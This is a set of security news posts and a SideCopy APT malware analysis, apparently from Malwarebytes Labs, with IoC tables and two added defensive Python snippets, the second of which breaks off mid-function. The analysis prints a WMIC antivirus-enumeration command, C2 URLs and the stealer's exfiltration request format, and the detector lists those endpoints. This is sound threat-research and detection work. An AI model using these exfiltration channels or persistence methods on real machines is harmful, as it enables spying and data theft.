IT NEWS

How to check for Windows updates and install them

Keeping Windows up to date is an important part of warding off malware, exploits, and other attacks. If you’re not running the latest version of your OS, it can give cybercriminals the leverage they need to compromise your system.

Unfortunately not all machines are running automatic updates by default, depending on your operating system. This used to primarily be a problem on older versions of Windows. With something like Windows 10, you can’t hold back the update tide forever. The best you can do is pause updates for up to 35 days, at which point the only way you can pause again is to install new updates.

Outside of the pause/repeat cycle, most folks would resort to registry edits for longer periods of going without an update. This isn’t recommended for most users. If you’re a regular home user, there’s probably not many specific edge-case reasons why you’d want to have updates switched off.

How to check your Windows update status

Your updates should in theory be running in the background.

If you want to check whether they are, type “Windows update” into the search bar from the Start menu, and click into the Updates section. There, you’ll find a wide range of options and information.

At the very top, you’ll see if you’re up to date or not along with the time the computer last checked. From here, you can also manually check for updates.

If there are additional updates soon to be coming down the pipeline, you’ll also be able to see what they are, along with some details about the update. You can download and install manually before the updates are grabbed automatically.

If your system isn’t compatible with Windows 11, there’ll be a big box letting you know, along with the option to grab the Microsoft PC Health Check App. This will explain in more detail why you may not be able to meet system requirements for Windows 11.

Check your Windows update settings

Underneath the Windows 11 status box is a selection of fine tuning options related to Windows updates. These are:

Pause updates for 7 days. The length of pause required can be altered to your liking in the advanced options (to a maximum of 35 days).

Change active hours. This is for letting Microsoft know which time is best for updates, downloads, and so on. Many folks leave their PCs on overnight, so having all the update heavy lifting take place while asleep is ideal for them. Will you be out during the day? No problem, maybe daytime updates would fit your routine better.

View update history. This can be useful for troubleshooting or just keeping up to date with what’s been going on. Maybe a specific update went AWOL somehow. This is where you’d likely begin your search.

Advanced options. This is where you can alter the pause length for updates. You can also tell the device to receive updates for other Microsoft products when you update Windows. There are additional options for downloading over metered connections, restarting the device “as soon as possible” when a restart is required to install an update, and also various rules for on-screen notifications.

Is Windows update free?

Absolutely, and we recommend you make full use of its capabilities. Your devices will be that little bit more secure with regular automatic updates enabled.

The post How to check for Windows updates and install them appeared first on Malwarebytes Labs.

A week in security (Nov 29 – Dec 5)

Last week on Malwarebytes Labs:

Stay safe!


NSO Group spyware found on iPhones of US State Department employees

iPhones of at least nine US State Department employees are said to have been hacked using the Pegasus spyware developed by the Israeli technology company, NSO Group. Pegasus is a proprietary and sophisticated spyware capable of the remote surveillance of smartphones.

The employees targeted by an unknown group using the spyware are either “based in Uganda or focused on matters concerning the East African country,” according to Reuters. The hack, which took place a few months back, is said to be the widest known hack of US officials through NSO technology.

Among those notified by Apple for being targeted by the NSO Group spyware is Norbert Mao, president of Uganda’s Democratic party. He tweeted:

The iPhones were infected using a graphics processing vulnerability that Apple only learned about and patched in September this year. The flaw is said to have been taken advantage of since at least February.

In an interview with CNN, University of Toronto’s Citizen Lab’s John Scott-Railton, who investigated Pegasus, urged the US Bureau of Diplomatic Security to do more to protect State Department devices. “NSO has been a plain-sight national security threat for years, and the fact that these breaches happened and Apple is required to do the notification, shows that the threat was not being taken seriously enough,” Scott-Railton told the news outfit.

NSO Group controversy

Last month, the US Commerce Department blacklisted NSO Group, accusing it of providing spyware to foreign governments who then used the tools “to maliciously target journalists, embassy workers, and activists.” The blacklisting makes doing business with NSO Group more difficult for US companies.

Weeks after, Apple filed a lawsuit against NSO Group for breaking into its iOS platform to target US citizens.

And then last week, 86 human rights groups and experts issued a joint letter to European states, asking them to sanction NSO Group based on credible reporting that the Pegasus spyware has aided governments in abusing human rights.

According to a senior official of the Biden administration, the government is cracking down on companies like NSO Group to protect its citizens stationed in foreign countries and “pursue new global discussion about spying limits”. Sen. Ron Wyden, who is a member of the Senate Intelligence Committee, is quoted as saying: “Companies that enable their customers to hack US government employees are a threat to America’s national security and should be treated as such.”

Denial

NSO Group released a statement on Thursday denying that its tools were used in this hacking incident, and said it was happy to cooperate with relevant government authorities.

“If our investigation shall show these actions indeed happened with NSO’s tools, such customer will be terminated permanently and legal actions will take place.”


Why Macs are the best, according to Mac expert Thomas Reed: Lock and Code S02E23

In the year 2021, the war for computer superiority has a clear winner, and it is the Macintosh, by Apple. The company’s Pro model laptops are finally, belatedly equipped with ports that have been standard in other computers for years. The company’s beleaguered “butterfly” keyboard has seemingly been erased from history. And the base model of the company’s powerhouse desktop tower could set you back a hefty $6,000.

What’s not to love?

Ribbing aside, according to our resident Mac expert at Malwarebytes, Thomas Reed, Apple has made several important decisions about device design in the past few decades to make its devices more secure, easier to use, and harder to tamper with. And that’s a boon to users because, as Malwarebytes discovered just a couple of years ago, the threats to Mac machines increased by 400 percent from the year prior. But threats to Apple devices extend beyond laptop and desktop threats: for years, small companies have been finding vulnerabilities in Apple’s iOS mobile operating system and selling them to the highest bidders.

So, what defenses do Apple users have to prevent the increasing number of threats from impacting them directly? As Reed explained in this week’s Lock and Code episode with host David Ruiz, there’s a lot. Apple keeps bad users out, prevents clueless users from messing things up, and it works somewhat diligently to catch malware when it’s first reported on.

But not everything is as good as it should be, Reed said. In particular, Apple’s ideology about product secrecy has bled into its approach to security updates, meaning that the company has failed to provide transparent, timely communication to its users when it matters most.

“I can understand the secrecy when it comes to new products and new designs. But when it comes to security, communication is really important and Apple could really learn something from Microsoft.”

Thomas Reed, director of Mac and Mobile at Malwarebytes

Tune in to the latest episode of Lock and Code to learn about Mac security successes and failures, and about Mac history and Reed’s first experience with a computer mouse, along with a story about, reportedly, the first-ever ransomware attack in history.


You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.


Emotet’s back and it isn’t wasting any time

Emotet is one of the best known, and most dangerous, malware threats of the past several years.

On several occasions it appeared to take an early retirement, but it has always come back. In January of this year, a global police operation dismantled Emotet’s botnet. Law enforcement then used their control of this infrastructure to send a “self-destruct” update to Emotet executables. Infected organizations were given a few months’ grace to clean up the neutered malware before the remaining copies did as they’d been instructed and ate themselves in April.

However, that wasn’t the end of the story.

Last month we reported on how another notorious bit of malware, TrickBot, was helping Emotet come back from the dead. And then yesterday, several security researchers saw another huge spike in Emotet’s activity.

Blinking light

The presence of Emotet in the threat landscape has had the appearance of a blinking red light for years. Emotet started out in 2014 as an information-stealing banking Trojan that scoured sensitive financial information from infected systems (which is why Malwarebytes detects some components as Spyware.Emotet). Over the years, it evolved into a global-scale distribution infrastructure for other malware.

During this time we have seen Emotet disappear and show up again on several occasions. In September 2019, Emotet emerged from a four month hiatus with a new spam campaign, before going back into hiding early in 2020 and reappearing in July of the same year. Its use then declined, with occasional spikes, before it returned just in time for Christmas and was then dealt a massive blow by collective law enforcement action in January this year.

Recent spikes

On December 1, 2021, our Threat Intelligence team noted a huge spike in Emotet C2 activity.

Figure: C2 activity observed by Malwarebytes

Other researchers also noted spikes in the number of URLs being used to distribute the malware, and the number of malware samples.

From all the reports and alerts by researchers and analysts we can see a few interesting trends.

  • First of all, our own research shows the global distribution of Emotet has a clear focus on the US.
Figure: Global coverage of the Emotet campaign

Speculation

From this point on the content of this post is speculation, so feel free to skip it if you have developed your own theories. Or feel free to compare notes and leave your remarks in the comments.

Emotet is growing a lot faster than any newcomer to the scene could do. This seems to indicate that old relationships have been renewed, which usually means that the persons that tied these knots in the past are still working on the project and bringing “old friends” back in.

Given the global distribution and the different campaigns that are ongoing it’s likely there are several different affiliates at work. And looking at their methods we can tell that these are not some “fresh out of their mother’s basement script kiddies” either. They are using sophisticated methods and abusing vulnerabilities that haven’t been patched yet by quite a lot of organizations. For example, some Microsoft Exchange vulnerabilities will allow them to hijack existing email threads, which gives the spam messages a higher credibility.

I checked the hosting companies for the WordPress sites, expecting to find a lot of GoDaddy domains that might have been compromised while their credentials were for sale. But I found a lot of different hosting companies, which makes WordPress the common denominator. It’s likely therefore that the attackers are exploiting vulnerable versions of WordPress plugins like OptinMonster, WP Fastest Cache, and WooCommerce Dynamic Pricing and Discounts, all of which were recently patched. (Although there are probably others that we do not know about yet too.)

Hard fact

Emotet is back! For how long is hard to predict, but they don’t behave as if they have any plans to retire again soon.

Stay safe, everyone!


Attacker unmasked by VPN flubs charged with Ubiquiti hack

A veritable barn-stormer of an insider threat story has recently come to light.

A former employee of Ubiquiti Networks, Nickolas Sharp, has been arrested and charged for allegedly hacking company servers, stealing gigabytes of information, and then rounding it all off with a splash of extortion. This took place in December of last year, but there’s no clear reason (yet) for why he did any of it.

The alleged perpetrator might have gotten away with it too, but for several disastrous choices which ultimately led to their downfall.

Covering his tracks

Sharp clearly put some thought into the attack. Many people would perhaps just blunder across the network, leaving large but unintentional “It was me” footprints all over the place. Not so here… he made use of his network access to alter logs and more, throwing a blanket over what was actually taking place. Cleverly, he used a VPN to hide his details while doing this.

He probably thought he’d gotten away with it. However, breaches do get discovered eventually. The clock was ticking. The question was: Had he done enough?

The answer was no, he hadn’t.

Finding himself on the incident response team investigating his own attack(!), he’s alleged to have threatened to release data stolen from his employer if a ransom demand for 50 bitcoin (roughly $2 million when this all took place) wasn’t paid. According to the US Department of Justice, he then released some of the files when the ransom wasn’t forthcoming. None of this is really conducive to keeping a low profile, and the wheels started to come off.

Anonymous—up to a point

If you’re up to no good and relying on anonymity to protect you, even the slightest connection to your real life can bring the whole scheme crashing down.

Sharp’s attempts to avoid detection apparently rested on his use of a VPN. This, in theory, would keep his real IP address hidden. Law enforcement had other ideas, working out a connection between the VPN account used to attack Ubiquiti and one used to create Sharp’s PayPal account.

The real kicker is that when his home internet briefly went down, so too did the VPN, and his real IP showed up as connecting to the previously mentioned workplace GitHub account.

From bad, to worse, to even worse than that

A visit from law enforcement might deter most people from further antics. If it were me, I’d cut my losses and keep a very low profile. However, this story was made for further antics. The Department of Justice claims the alleged perpetrator posed as a company whistleblower after the FBI had searched his home. This “whistleblower” routine took the form of stories potentially damaging to the Ubiquiti Networks organisation.

This is, frankly, an astonishing chain of events. Especially considering this hack had such a big impact on stock. It remains to be seen what, exactly, would drive someone to this sort of self-destructive cavalcade of disaster. For now, you’ll have to make do with the indictment (PDF).

When insiders attack

We’ve talked about the harms caused by insider threats many times on this blog. Problems can arise from disgruntled employees who’ve gone past the point of no return with scores to settle. Ex-employees who didn’t have their access to systems revoked can be a problem. Even the humble printer can become a battleground for keeping certain types of special paper out of easy reach. Even the FBI aren’t safe from such events.

It’s not possible to eliminate this issue completely, unfortunately. On the bright side, we can see that even in a case as severe as the Ubiquiti attack, the long arm of the law can catch up with criminals eventually—no matter how well prepared they think they are.


SideCopy APT: Connecting lures to victims, payloads to infrastructure

This blog post was authored by Hossein Jazi and the Threat Intelligence Team.

Last week, Facebook announced that back in August it had taken action against a Pakistani APT group known as SideCopy. Facebook describes how the threat actors used romantic lures to compromise targets in Afghanistan.

In this blog post we are providing additional details about SideCopy that have not been published before. We were able to have unique insights about victims and targeted countries as well as the kind of data the APT group was able to successfully exfiltrate. Among the information that was stolen is access to government portals, Facebook, Twitter and Google credentials, banking information, and password-protected documents.

In addition, we detail how this threat actor had started to use new initial infection vectors for its operations which include Microsoft Publisher documents and Trojanized applications. Finally, we detail a newly-observed stealer that has been used by this actor called AuTo stealer.

Newly observed lures

The SideCopy APT is a Pakistani threat actor that has been operating since at least 2019, mainly targeting South Asian countries and more specifically India and Afghanistan. Its name comes from its infection chain that tries to mimic that of the SideWinder APT. It has been reported that this actor has similarities with Transparent Tribe (APT36) and possibly is a subdivision of this actor. Cisco Talos and Seqrite have provided comprehensive reports on this actor’s activities.

The lures used by SideCopy APT are usually archive files that have embedded one of these files: Lnk, Microsoft Publisher or Trojanized Applications. These lures can be categorized into two main groups:

  • Targeted lures: These lures are specially crafted and designed to target specific victims. We believe this category is very well customized to target government or military officials. Here are some of the examples:
    • Report-to-NSA-Mohib-Meeting-with-FR-GE-UK.zip:
      This archive file contains a Microsoft Publisher document that is a letter from “Mr Ahmad Shuja Jamal, former DG for International Relations and Regional Cooperation at the National Security Council of Afghanistan” to “Hamdullah Mohib, former National Security Adviser of Afghanistan”. This letter is about a “meeting with representatives of France and UK delegations of Afghanistan”. Most likely this lure has been used to target Afghanistan government officials, especially those working on foreign affairs.
    • address-list-ere-update-sep-2021.zip: This archive file contains a malicious lnk file which loads a decoy PDF file. The decoy PDF file is: “Email facility address list of the ERE units: 20 Sept 2021”. This lure seems to be used to target the Indian Army and National Cadet Corps of India.
    • NCERT-NCF-LTV-Vislzr-2022.zip: Similar to the previous one, this includes a malicious lnk that loads a decoy PDF file. The decoy is a curriculum of the course named “Living the values, a value-narrative to grass-root leadership” offered by NCERT (National Council of Educational Research and Training of India).
Figure 1: NSA meeting lure
Figure 2: Email facility address list of the ERE units: 20 Sept 2021
Figure 3: Living the values course
  • Generic lures: These lures are mostly generic and most likely have been used in spam campaigns to collect emails and credentials to help the actor perform their targeted attacks. In this category we observed the following: (The first three lures are the ones reported as “romantic lures” in a Facebook report)
    • Using girl names as the archive file name, such as “nisha.zip” (showing girl pictures with an application): These archive files contain a list of images with the “.3d” extension and an application named “3Dviewer.exe” that needs to be executed to load and view the images. In fact, the executable is Trojanized and will contact the actor’s servers to download the malicious payloads.
    • “image-random number.zip”: These zip files contain a malicious lnk file that shows a girl picture as a decoy.
    • “Whatsapp-image-random number.zip”: These zip files contain a malicious lnk file that shows a girl picture as a decoy.
    • “schengen_visa_application_form_english.zip”: This archive file contains a Microsoft Publisher document that loads a Schengen Visa Application Form in English as a decoy. This is used to target people who want to travel to European countries.
    • “Download-Maria-Gul-CV.zip”: This archive contains a lnk that loads a resume as a decoy. The name of the archive file usually follows the pattern “Download-Name-FamilyName-CV.zip”.
    • “New document.zip”: This loads a document as a decoy. We were not able to retrieve the lure in this case.
Figure 4: Schengen Visa Application Form
Figure 5: 3DViewer.exe

Victimology

As previously reported, the SideCopy APT has mainly targeted defense and armed forces personnel in the Indian subcontinent but there are not many reports about how successful these attacks were and what data was exfiltrated. The Malwarebytes Threat Intelligence team was able to identify some of the successful attacks operated by this APT. It is worth noting that those compromises happened before the Taliban completely took over Afghanistan. In fact, Facebook’s intervention in August matches with the timeline of indicators we recorded.

  • Administration Office of the President (AOP) of Afghanistan personnel: This actor has operated targeted spear phishing attacks on members of AOP and was able to gain access to ten of them and steal their credentials from different government services such as mis.aop.gov.af, internal service, bank services (Maiwand Bank) and personal accounts such as Google, Twitter and Facebook.
  • Ministry of Foreign Affairs, Afghanistan: We have evidence that the actor infected one of the members of the Ministry of Foreign Affairs, but it seems they were not able to collect any data from this victim.
  • Ministry of Finance, Afghanistan: The actor infected two members of MOF, but mostly they were able to collect personal accounts such as Google and Facebook and bank accounts (“worldbankgroup.csod.com”). They also exfiltrated documents that are password protected.
  • Afghanistan’s National Procurement Authority (NPA): The actor infected one person in NPA and was able to steal personal credentials including Twitter, Facebook, Instagram, Pinterest, Google and the mis.aop.gov.af account.
  • A shared computer, India: It seems the actor gained access to a shared machine and collected a lot of credentials from government and education services. It seems this machine has been infected using one of the generic lures.

The SideCopy APT was able to steal several Office documents and databases associated with the Government of Afghanistan. As an example, the threat actor exfiltrated Diplomatic Visa and Diplomatic ID cards from the Ministry of Foreign Affairs of Afghanistan database, as well as the Asset Registration and Verification Authority database belonging to the General Director of Administrative Affairs of Government of Afghanistan. They also were able to exfiltrate the ID cards of several Afghani government officials.

Figure 6: Asset Registration and Verification Authority database belonging to the General Director of Administrative Affairs of Government of Afghanistan

The exfiltrated documents contain names, numbers and email addresses associated with government officials. It is possible that they have been already targeted by the actor or will be the future targets of this actor. There are also some confidential letters that we think the actor is planning to use for future lures.

Attacker infrastructure

We have uncovered the main command and control (C2) server used by the attacker to monitor and control their victims. Each archive file that is used by the attacker to send to victims is considered a unique package and each package has its own payloads including hta and executables that usually are hosted on compromised domains. The actor has a system named “Scout” to monitor each package. The Scout system has four users with English nicknames (Hendrick, Alexander, Hookes, Malone). It also defines teams that are responsible to manage each package.

Figure 7: Scout system

In this system, they have a dashboard that shows all the infected machines. Each row in the dashboard shows one package and its statistics which includes the IP address of the victim, package name, OS version, User-Agent, browser information, country and victim status.

Figure 8: Dashboard

The actor uses a different dashboard called Crusader to monitor the Action RAT statistics.

Figure 9: Crusader

Analysis of the new attacks

As we mentioned earlier, the actor has used three different methods as its initial infection vector: lnk files, Microsoft Publisher files and Trojanized application. The lnk files have been well studied and what we have observed is very similar to what already has been reported, with only small changes. For example, we observed that they have updated the code of hta.dll and preBotHta.dll and added some more features.

In this section we provide the analysis for the other two variants: Microsoft Publisher and Trojanized Applications.

Microsoft Office Publisher

In this variant, attackers have embedded a Microsoft Office Publisher document in an archive file. We’ve identified two variants of the Office publisher documents:

  • Report to NSA Mohib – Meeting with FR, GE, UK – 12 Nov 2020.docx.pub
  • schengen_visa_application_form_english.pub

Both of these documents were created in August 2021 and we believe they have been used in the most recent campaign. Both of these documents contain a simple macro that calls the Shell function to launch mshta.exe, which downloads and executes a specified hta file.

Figure 10: Embedded macros

The hta file loads the loader DLL (PreBotHta.dll) into memory and then collects AV product names. The AV name along with the encoded payloads that need to be loaded by this loader are passed to the PinkAgain function.

Figure 11: HTA file

The loader is responsible for dropping both credwiz.exe and Duser.dll. Unlike what has been reported, in this case Duser.dll is not copied into different locations based on AV products; it is copied into C:\ProgramData\ShareIt for all AV products.

Figure 12: Loader dll

This loader just does some additional work based on the AV product. For example, if the AV product is Avira it tries to download and execute an additional hta file to deploy additional payloads.

Figure 13: Additional payload execution based on the AV type

After dropping the required files onto the victim, it starts the “credwiz.exe” process. This executable sideloads the malicious payload “Duser.dll”. This payload has been written in Delphi (this is the Delphi variant of Action Rat) and compiled on October 2 2021.

All the commands, strings and domains in this RAT are base64 encoded. The malicious process starts by collecting hostname, username, OS version, OS architecture, MAC address and installed AV products (by executing cmd.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List) from the victim and sending them to the command and control server using an HTTP request ("https://afrepublic.xyz/classification/classification.php").
It then goes into a loop and waits for commands from the server to execute them. This RAT has the capability to execute one of the following commands:

  • Command: Execute commands received from the server
  • Download: Download additional payloads
  • Drives: Get drive info
  • GetFiles: Get files info
  • Execute: Execute a specified payload using CreateProcessW
  • Upload: Upload files to server
Figure 14: Commands

After execution of each command it reports the result back to its server. The reporting URL is different from the C2 URL. The report type depends on the command; for example, if the payload executes a command, it reports the following information to the server: the victim’s ID, the executed command, the command output and the error message if the command execution was not successful.

Trojanized Image Viewer Application (3DViewer.exe)

In this variant, the attacker has distributed an archive file including an application named 3Dviewer.exe and a set of images with “3d” extension that can be only opened by that executable.

It seems the attacker Trojanized an image viewer application named “3Dviewer” to download and execute a malicious HTA file using Mshta in addition to its normal function that can load and show the pictures. This executable has been compiled on October 26 2021. The rest of the process is similar to what we described in the previous section.

Figure 15: 3DViewer.exe

AuTo Stealer

We also came across another Stealer used by this actor that has been written in C++. To the best of our knowledge this is a new Stealer used by SideCopy APT. A Loader has been used to drop and load an executable (credbiz.exe) that side loads the Stealer. We were able to identify two different variants of this Loader that have been used to load an HTTP version and a TCP version of the Stealer. Both of these loaders and the Stealer components have been compiled on October 30 2021.

Loader

Based on the functionality, we can say this Loader is a C++ variant of PreBotHta.dll (the C# Loader used to load other RATs used by this actor). This Loader is responsible for dropping the following files in the C:\ProgramData\Oracle directory:

  • credwiz.exe, renamed to credbiz.exe.
  • TextShaping.dll (Stealer component that will be side loaded by credbiz.exe)
Figure 16: Drop credbiz and TextShaping

Similar to PreBotHta.dll, it checks the installed AV product on the victim’s machine and performs additional actions based on the AV product name. For example, if the AV is Avast, Avira, BitDefender or AVG it creates a batch file (sysboot.bat) and executes it by calling cmd.exe. This gives credbiz.exe persistence through the AutoRun registry key. If the installed AV is one of Kaspersky, Symantec, McAfee or QuickHeal it creates an lnk file (Win Setting Loader.lnk) in the StartUp directory for persistence.

After performing the additional process, it executes credbiz.exe by calling CreateProcessW.

Figure 17: Additional functionality based on AV product

TextShaping.dll (Stealer component)

The actor used two different variants of the Stealer: HTTP and TCP. The HTTP variant performs the exfiltration over HTTP, while the TCP variant performs all of its exfiltration over TCP. This component also has an interesting, unique PDB path: "D:\Project Alpha\HTTP Auto\app\Release\app.pdb"

This Stealer collects PowerPoint, Word, Excel and PDF documents, text files, database files and images and exfiltrates them to its server over HTTP or TCP. To exfiltrate data over HTTP, it builds a request specific to the type of file being exfiltrated and sends it to its HTTP server. For example, to exfiltrate PowerPoint documents it builds the following request:
http://newsroom247.xyz:8080/streamppt?HostName_UserName

Figure 18: Stealer

For other file types it uses the /stream path corresponding to the file type. The full list is: /streamppt, /streamdoc, /streamxls, /streamdb, /streamtxt, /streampdf, /streamimg.

Before starting the stealing process, it collects the victim’s information, including username, hostname, OS info and AV products, and sends it to its server by adding “user_details” to the domain. It also collects file information from the victim’s machine, stores it in a file named “Hostname_UserName.txt” and sends that file using the “logs_receiver” command.
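The HTTP variant's request shape described above (a C2 host, a per-file-type /stream path, and a HostName_UserName tag as the query string) is easy to express as proxy-log detection logic. The following is an added example, not code from the Malwarebytes report: the log format and the log lines are constructed, the C2 hosts are the ones in the IoC table below, and the assumption that “user_details” and “logs_receiver” appear as paths of the same form as the /stream endpoints is mine, since the text only says they are added to the domain.

```python
"""Flag AuTo Stealer exfiltration traffic in web-proxy logs.

Added example; not code from the Malwarebytes report. The log format
(timestamp, client, method, URL, status) and the log lines are constructed;
the /stream* endpoint names, the HostName_UserName query tag and the C2
hosts are the ones listed in the report. Treating user_details and
logs_receiver as request paths is an assumption.
"""
import re
from urllib.parse import urlsplit

# C2 domains and IP from the report's IoC table.
C2_HOSTS = {
    "afrepublic.xyz", "newsroom247.xyz", "afghannewsnetwork.com", "scouttable.xyz",
    "securedesk.one", "republicofaf.xyz", "appsstore.in", "scout.fontsplugins.com",
    "144.126.141.41",
}
# One /stream* endpoint per document type plus the two bookkeeping commands (assumed path form).
EXFIL_PATH = re.compile(r"^/(?:stream(?:ppt|doc|xls|db|txt|pdf|img)|user_details|logs_receiver)$")
# The stealer tags every request with <HostName>_<UserName> as the raw query string.
HOST_USER_TAG = re.compile(r"^[A-Za-z0-9-]+_[A-Za-z0-9.-]+$")
LOG_LINE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3})$")


def classify_request(url: str) -> list:
    """Return the reasons a single request URL looks like AuTo Stealer traffic."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    reasons = []
    if host in C2_HOSTS:
        reasons.append(f"known SideCopy C2 host {host}")
    if EXFIL_PATH.match(parts.path):
        reasons.append(f"AuTo Stealer endpoint {parts.path}")
        if HOST_USER_TAG.match(parts.query):
            reasons.append(f"HostName_UserName tag {parts.query}")
    return reasons


def scan_log(lines) -> list:
    """Return (client, url, reasons) for every log line that matched."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if not m:
            continue  # skip lines in another format
        reasons = classify_request(m["url"])
        if reasons:
            hits.append((m["src"], m["url"], reasons))
    return hits


# Constructed proxy log: two stealer requests among ordinary browsing.
SAMPLE_LOG = """\
2021-11-30T10:15:22Z 10.0.0.12 GET https://www.example.com/index.html 200
2021-11-30T10:15:40Z 10.0.0.12 POST http://newsroom247.xyz:8080/streamppt?WIN-7GH2_jdoe 200
2021-11-30T10:16:01Z 10.0.0.31 GET https://cdn.example.net/streaming/video.mp4 206
2021-11-30T10:16:09Z 10.0.0.31 POST http://198.51.100.7/user_details?DESKTOP-1A2B_alice 200
""".splitlines()

if __name__ == "__main__":
    for src, url, reasons in scan_log(SAMPLE_LOG):
        print(f"{src} {url}\n    " + "\n    ".join(reasons))
```

The path and query checks are kept separate from the host list on purpose: the second sample request goes to an address that is not in the IoC table, but the endpoint name and the victim tag still identify it, which matters once the actor rotates infrastructure.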

Conclusion

The SideCopy APT has been actively targeting government and military officials in South Asia. The group mainly uses archive files to target victims in spam or spear phishing campaigns. The archive files usually contain an embedded lnk file, Office document or Trojanized application that calls mshta to download and execute an hta file. The hta files perform fileless payload execution to deploy one of the RATs associated with this actor, such as AllaKore or Action RAT. Malwarebytes products can identify the initial infection vectors used by SideCopy and block them from execution.


IOCs

Name | IOC | Type | Description
Report-to-NSA-Mohib-Meeting-with-FR-GE-UK.zip | 4E26CCAD3FC762EC869F7930A8457E4D | MD5 |
schengen_visa_application_form_english.zip | C2831369728B7247193E2DB567900ABE | MD5 |
new document.zip | 689B9FDBF35B8CEFC266A92D1D05A814 | MD5 |
Image-8765.zip | D52021F350C9C2F8EE87D3B9C070704A | MD5 |
Image-8853.zip | D99491117D3D96DA7D01597929BE6C8E | MD5 |
479_1000.zip | 7C0A49F3B4A012BADE8404A3BE353A48 | MD5 |
Muniba.zip | A65D3AB8618E7965B9AE4FAE558EB8F2 | MD5 |
nisha.zip | 48C165124E151AA2A1F4909E0B34E99C | MD5 |
Whatsapp-Image-7569.zip | 0023A30B3F91FA9989E0843BBEB67CC1 | MD5 |
Download-Maria-Gul-CV.zip | 5044027CCB27401B06515F0912EB534A | MD5 |
DP_TCP.exe | ec87ddad01869b58c4c0760a6a7d98f8 | MD5 | AuTo Stealer
DP_HTTP.exe | e246728aa4679051ed20355ae862b7ef | MD5 | AuTo Stealer
TextShaping.dll | c598a8406e2b9ec599ab9e6ec4e7d7c2 | MD5 | AuTo Stealer
TextShaping.dll | 5f49c816d7d2b6fa274041055cc88ba7 | MD5 | AuTo Stealer
Payloads

Domain/IP | Description
afrepublic.xyz | C2
newsroom247.xyz | C2
afghannewsnetwork.com | C2
maajankidevisevasansthan.org | Hosts payloads
amsss.in | Hosts payloads
scouttable.xyz | C2
securedesk.one | C2
eurekawatersolution.com | Hosts payloads
republicofaf.xyz | C2
securecheker.in | Hosts payloads
appsstore.in | C2
scout.fontsplugins.com | C2
144.126.141.41 | C2
C2s and payload hosts

MITRE ATT&CK techniques

Tactic | ID | Name | Details
Phishing | T1566.001 | Spearphishing Attachment | Distributes an archive file as a spear phishing attachment
Execution | T1047 | Windows Management Instrumentation | Uses WMIC.EXE to obtain system information and a list of antivirus products
Execution | T1059.003 | Command and Scripting Interpreter: Windows Command Shell | Starts CMD.EXE to execute commands
Execution | T1204.001 | User Execution: Malicious Link |
Execution | T1204.002 | User Execution: Malicious File |
Persistence | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder |
Discovery | T1012 | Query Registry | Reads the computer name
Discovery | T1082 | System Information Discovery |
Discovery | T1518.001 | Software Discovery: Security Software Discovery | Uses WMIC.EXE to obtain a list of antivirus products
Defense Evasion | T1218.005 | Signed Binary Proxy Execution: Mshta | Starts MSHTA.EXE to open HTA or HTML files
Defense Evasion | T1140 | Deobfuscate/Decode Files or Information | Uses base64 decoding to decode C2 addresses
Defense Evasion | T1574.002 | Hijack Execution Flow: DLL Side-Loading | Uses credwiz.exe to side-load its malicious payloads
Collection | T1119 | Automated Collection | Collects database files, documents and PDFs automatically
Collection | T1005 | Data from Local System |
Command and Control | T1071.001 | Application Layer Protocol: Web Protocols |
Command and Control | T1071.002 | Application Layer Protocol: File Transfer Protocols |
Exfiltration | T1041 | Exfiltration Over C2 Channel |

The post SideCopy APT: Connecting lures to victims, payloads to infrastructure appeared first on Malwarebytes Labs.

Emotet being spread via malicious Windows App Installer packages

As reported by Cryptolaemus on Twitter, and demonstrated step by step by BleepingComputer, Emotet is now being distributed through malicious Windows App Installer packages that pretend to be Adobe PDF software.

How does the attack work?

To understand what Microsoft is supposed to do about this method, we need to look at how these attacks work. URLs are sent out to victims by using malspam. The emails are sent to appear as replies to existing conversations by using stolen reply-chain emails. In the email they ask the receiver to look at an attachment. Clicking the link brings the victim to a fake Google Drive page that prompts them to click a button to preview the PDF document.

Clicking the “Preview PDF” button triggers an ms-appinstaller URL that attempts to open a file with an .appinstaller extension hosted on Microsoft Azure, using URLs at *.web.core.windows.net. The .appinstaller extension belongs to Microsoft’s App Installer. An .appinstaller file is useful when multiple users need to deploy your MSIX installation package. It is an XML file that you can write by hand or generate, for example with Visual Studio. The .appinstaller file specifies where your app is located and how it should be updated.

When attempting to open an .appinstaller file, the Windows browser will prompt if you wish to open the Windows App Installer program to proceed. In this case, once you agree, you will be shown an App Installer window prompting you to install the “Adobe PDF Component.” This malicious package looks like a legitimate Adobe application, as it has a legitimate Adobe PDF icon, a valid certificate which marks it as a ‘Trusted App’, and fake publisher information.

If a user chooses to proceed with the install—and why would they stop this far down the rabbit hole?—App Installer will download and install the malicious appxbundle hosted on Microsoft Azure. This bundle drops a .dll on the affected system and creates a startup entry for this .dll. This startup entry will automatically launch the DLL when a user logs into Windows. At that point you are infected with Emotet.
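The chain above has two inspectable pieces before anything runs: the ms-appinstaller link (whose source parameter points at the manifest) and the .appinstaller XML itself, which names the package URL and a publisher string. The following is an added example, not code from the Malwarebytes post or from Microsoft, showing how a mail gateway or help desk could inspect both. The sample manifest, the lure-placeholder host under web.core.windows.net, and the trusted deployment host list are constructed placeholders; the element and attribute names (AppInstaller, MainBundle/MainPackage, Publisher, Uri, UpdateSettings/OnLaunch) follow the public App Installer schema. Signature validity is not checked here, so the publisher string is reported only for comparison with the actual signer.

```python
"""Inspect an ms-appinstaller link and its .appinstaller manifest before acting on it.

Added example; not code from the Malwarebytes post or from Microsoft. The
manifest, the lure-placeholder host and the trusted-host set are constructed.
Element and attribute names follow the public App Installer schema.
"""
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs, urlsplit

NS = {"ai": "http://schemas.microsoft.com/appx/appinstaller/2017/2"}
# Assumption: the only host your organisation deploys MSIX packages from.
TRUSTED_HOSTS = {"apps.corp.example"}


def extract_source(link: str):
    """Pull the manifest URL out of an ms-appinstaller:?source=... link, the
    kind the fake 'Preview PDF' button triggers; None for any other link."""
    if not link.lower().startswith("ms-appinstaller:"):
        return None
    query = link.split("?", 1)[1] if "?" in link else ""
    return parse_qs(query).get("source", [None])[0]


def inspect_appinstaller(xml_text: str, trusted_hosts=TRUSTED_HOSTS) -> dict:
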